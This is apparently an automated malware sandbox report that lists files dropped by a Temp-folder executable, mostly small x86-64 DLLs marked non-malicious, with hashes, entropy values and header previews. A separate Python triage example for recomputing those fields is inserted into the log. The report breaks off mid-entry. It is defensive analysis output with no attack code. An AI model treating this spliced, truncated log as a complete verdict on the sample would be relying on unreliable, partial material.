                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):5.146069394118203
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
                                                                                                                                                                                                                                MD5:225D9F80F669CE452CA35E47AF94893F
                                                                                                                                                                                                                                SHA1:37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
                                                                                                                                                                                                                                SHA-256:61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
                                                                                                                                                                                                                                SHA-512:2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
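The per-file fields the report lists (File Type, Entropy (8bit), MD5, SHA1, SHA-256, SHA-512) can be recomputed locally to verify a report entry against a file in hand, or to triage a batch of near-identical drops like the 22136-byte DLLs above. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it computes 8-bit Shannon entropy and the hashes, and derives the "PE32+ executable (DLL) (console) x86-64" classification from the DOS, COFF and optional headers. The PE buffer it builds is constructed inline for demonstration and is not one of the dropped files listed here; the SSDEEP field is omitted because it needs the third-party ssdeep library; function names (`shannon_entropy`, `describe_pe`, `triage`, `build_sample`) are the example's own.

```python
"""Recompute sandbox-style triage fields for a dropped PE from raw bytes.
Added example (not Joe Sandbox code); the sample buffer is constructed."""
import hashlib
import math
import struct

IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}
SUBSYSTEM_NAMES = {2: "GUI", 3: "console"}
MAGIC_NAMES = {0x10B: "PE32", 0x20B: "PE32+"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream,
    8.0 for a uniform one. This is the report's 'Entropy (8bit)' measure."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def describe_pe(data: bytes) -> dict:
    """Classify a PE image from its headers; returns {} when not a PE.
    Offsets follow the PE/COFF spec: e_lfanew at 0x3C, 20-byte COFF header,
    optional-header Magic at +0, Subsystem at +0x44 (same in PE32 and PE32+)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {}
    machine, nsections, _ts, _sym, _nsym, _opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 0x44)[0]
    fmt = MAGIC_NAMES.get(magic, hex(magic))
    is_dll = bool(chars & IMAGE_FILE_DLL)
    sub = SUBSYSTEM_NAMES.get(subsystem, str(subsystem))
    mach = MACHINE_NAMES.get(machine, hex(machine))
    return {
        "format": fmt,
        "is_dll": is_dll,
        "subsystem": sub,
        "machine": mach,
        "sections": nsections,
        # Same wording as the report's 'File Type' line, minus the OS suffix
        "file_type": f"{fmt} executable ({'DLL' if is_dll else 'EXE'}) ({sub}) {mach}",
    }


def triage(data: bytes) -> dict:
    """Size, entropy, hashes (upper-case, as the report prints them) plus
    the PE classification when the bytes are a PE image."""
    out = {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }
    out.update(describe_pe(data))
    return out


def build_sample() -> bytes:
    """Constructed minimal PE32+ console DLL for x86-64 (headers only plus
    filler); not a real dropped file, just enough structure to classify."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)            # e_lfanew -> right after DOS header
    chars = 0x0002 | 0x0020 | IMAGE_FILE_DLL          # EXECUTABLE | LARGE_ADDRESS_AWARE | DLL
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, 240, chars)
    opt = bytearray(240)                              # PE32+ optional header size
    struct.pack_into("<H", opt, 0, 0x20B)             # Magic: PE32+
    struct.pack_into("<H", opt, 0x44, 3)              # Subsystem: IMAGE_SUBSYSTEM_WINDOWS_CUI
    return bytes(dos) + coff + bytes(opt) + bytes(range(256))


if __name__ == "__main__":
    for k, v in triage(build_sample()).items():
        print(f"{k}: {v}")
```

Pointing `triage` at a directory of drops and grouping on `size` and `file_type` is enough to see that the entries above form one family (same size, same section layout, same Rich-header stub in the preview) even though every hash differs; a per-file hash match against the report then confirms that the copy in hand is the one that was analysed.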
Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.834520503429805
Encrypted:false
SSDEEP:192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
MD5:1281E9D1750431D2FE3B480A8175D45C
SHA1:BC982D1C750B88DCB4410739E057A86FF02D07EF
SHA-256:433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
SHA-512:A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.916367637528538
Encrypted:false
SSDEEP:192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
MD5:FD46C3F6361E79B8616F56B22D935A53
SHA1:107F488AD966633579D8EC5EB1919541F07532CE
SHA-256:0DC92E8830BC84337DCAE19EF03A84EF5279CF7D4FDC2442C1BC25320369F9DF
SHA-512:3360B2E2A25D545CCD969F305C4668C6CDA443BBDBD8A8356FFE9FBC2F70D90CF4540F2F28C9ED3EEA6C9074F94E69746E7705E6254827E6A4F158A75D81065B
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.829681745003914
Encrypted:false
SSDEEP:192:HNpWqhW5WJWadJCsVWQ4mWbZyttuX01k9z3A2qkFU:HXWqhW4Cs1SR9zf9U
MD5:D12403EE11359259BA2B0706E5E5111C
SHA1:03CC7827A30FD1DEE38665C0CC993B4B533AC138
SHA-256:F60E1751A6AC41F08E46480BF8E6521B41E2E427803996B32BDC5E78E9560781
SHA-512:9004F4E59835AF57F02E8D9625814DB56F0E4A98467041DA6F1367EF32366AD96E0338D48FFF7CC65839A24148E2D9989883BCDDC329D9F4D27CAE3F843117D0
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@............`A........................................p...H............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.612408827336625
Encrypted:false
SSDEEP:192:CWqhW+WJWadJCsVWQ4mWprgfKUSIX01k9z3AEXzh:CWqhW7Cs12IR9z5F
MD5:0F129611A4F1E7752F3671C9AA6EA736
SHA1:40C07A94045B17DAE8A02C1D2B49301FAD231152
SHA-256:2E1F090ABA941B9D2D503E4CD735C958DF7BB68F1E9BDC3F47692E1571AAAC2F
SHA-512:6ABC0F4878BB302713755A188F662C6FE162EA6267E5E1C497C9BA9FDDBDAEA4DB050E322CB1C77D6638ECF1DAD940B9EBC92C43ACAA594040EE58D313CBCFAE
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.918215004381039
Encrypted:false
SSDEEP:192:OvMWqhWkWJWadJCsVWQ4mWoz/HyttuX01k9z3A21O:JWqhWxCs/SSR9zf1O
MD5:D4FBA5A92D68916EC17104E09D1D9D12
SHA1:247DBC625B72FFB0BF546B17FB4DE10CAD38D495
SHA-256:93619259328A264287AEE7C5B88F7F0EE32425D7323CE5DC5A2EF4FE3BED90D5
SHA-512:D5A535F881C09F37E0ADF3B58D41E123F527D081A1EBECD9A927664582AE268341771728DC967C30908E502B49F6F853EEAEBB56580B947A629EDC6BCE2340D8
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......UJ....`A.........................................................0...............0..x&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26216
Entropy (8bit):4.882777558752248
Encrypted:false
SSDEEP:192:I9cy5WqhWKWEXCVWQ4mW1pbm6yttuX01k9z3A2jyM:Ry5WqhWdcbmLSR9zfjj
MD5:EDF71C5C232F5F6EF3849450F2100B54
SHA1:ED46DA7D59811B566DD438FA1D09C20F5DC493CE
SHA-256:B987AB40CDD950EBE7A9A9176B80B8FFFC005CCD370BB1CBBCAD078C1A506BDC
SHA-512:481A3C8DC5BEF793EE78CE85EC0F193E3E9F6CD57868B813965B312BD0FADEB5F4419707CD3004FBDB407652101D52E061EF84317E8BD458979443E9F8E4079A
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P............`A.........................................................@...............@..h&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.738587310329139
Encrypted:false
SSDEEP:192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
MD5:F9235935DD3BA2AA66D3AA3412ACCFBF
SHA1:281E548B526411BCB3813EB98462F48FFAF4B3EB
SHA-256:2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
SHA-512:AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......h*....`A............................................"............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):5.202163846121633
Encrypted:false
SSDEEP:192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
MD5:5107487B726BDCC7B9F7E4C2FF7F907C
SHA1:EBC46221D3C81A409FAB9815C4215AD5DA62449C
                                                                                                                                                                                                                                SHA-256:94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
                                                                                                                                                                                                                                SHA-512:A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......M4....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.866983142029453
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
                                                                                                                                                                                                                                MD5:D5D77669BD8D382EC474BE0608AFD03F
                                                                                                                                                                                                                                SHA1:1558F5A0F5FACC79D3957FF1E72A608766E11A64
                                                                                                                                                                                                                                SHA-256:8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
                                                                                                                                                                                                                                SHA-512:8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.828044267819929
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
                                                                                                                                                                                                                                MD5:650435E39D38160ABC3973514D6C6640
                                                                                                                                                                                                                                SHA1:9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
                                                                                                                                                                                                                                SHA-256:551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
                                                                                                                                                                                                                                SHA-512:7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):30328
                                                                                                                                                                                                                                Entropy (8bit):5.14173409150951
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
                                                                                                                                                                                                                                MD5:B8F0210C47847FC6EC9FBE2A1AD4DEBB
                                                                                                                                                                                                                                SHA1:E99D833AE730BE1FEDC826BF1569C26F30DA0D17
                                                                                                                                                                                                                                SHA-256:1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
                                                                                                                                                                                                                                SHA-512:992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.883012715268179
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
                                                                                                                                                                                                                                MD5:272C0F80FD132E434CDCDD4E184BB1D8
                                                                                                                                                                                                                                SHA1:5BC8B7260E690B4D4039FE27B48B2CECEC39652F
                                                                                                                                                                                                                                SHA-256:BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
                                                                                                                                                                                                                                SHA-512:94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26208
                                                                                                                                                                                                                                Entropy (8bit):5.023753175006074
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
                                                                                                                                                                                                                                MD5:20C0AFA78836B3F0B692C22F12BDA70A
                                                                                                                                                                                                                                SHA1:60BB74615A71BD6B489C500E6E69722F357D283E
                                                                                                                                                                                                                                SHA-256:962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
                                                                                                                                                                                                                                SHA-512:65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26232
                                                                                                                                                                                                                                Entropy (8bit):5.289041983400337
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
                                                                                                                                                                                                                                MD5:96498DC4C2C879055A7AFF2A1CC2451E
                                                                                                                                                                                                                                SHA1:FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
                                                                                                                                                                                                                                SHA-256:273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
                                                                                                                                                                                                                                SHA-512:4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26232
                                                                                                                                                                                                                                Entropy (8bit):5.284932479906984
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
                                                                                                                                                                                                                                MD5:115E8275EB570B02E72C0C8A156970B3
                                                                                                                                                                                                                                SHA1:C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
                                                                                                                                                                                                                                SHA-256:415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
                                                                                                                                                                                                                                SHA-512:B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):5.253102285412285
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
                                                                                                                                                                                                                                MD5:001E60F6BBF255A60A5EA542E6339706
                                                                                                                                                                                                                                SHA1:F9172EC37921432D5031758D0C644FE78CDB25FA
                                                                                                                                                                                                                                SHA-256:82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
                                                                                                                                                                                                                                SHA-512:B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.810971823417463
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
                                                                                                                                                                                                                                MD5:A0776B3A28F7246B4A24FF1B2867BDBF
                                                                                                                                                                                                                                SHA1:383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
                                                                                                                                                                                                                                SHA-256:2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
                                                                                                                                                                                                                                SHA-512:7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1333651
                                                                                                                                                                                                                                Entropy (8bit):5.5868779115750264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:uttcY+bS4OmE1jc+fYNXPh26UZWAzDX7jOIqL3CjHgopRdmoPFHz1dcfsFvaYcIe:uttcY+NHSPD/e2cqRdmoPxzQIaYcIe
                                                                                                                                                                                                                                MD5:8DAD91ADD129DCA41DD17A332A64D593
                                                                                                                                                                                                                                SHA1:70A4EC5A17ED63CAF2407BD76DC116ACA7765C0D
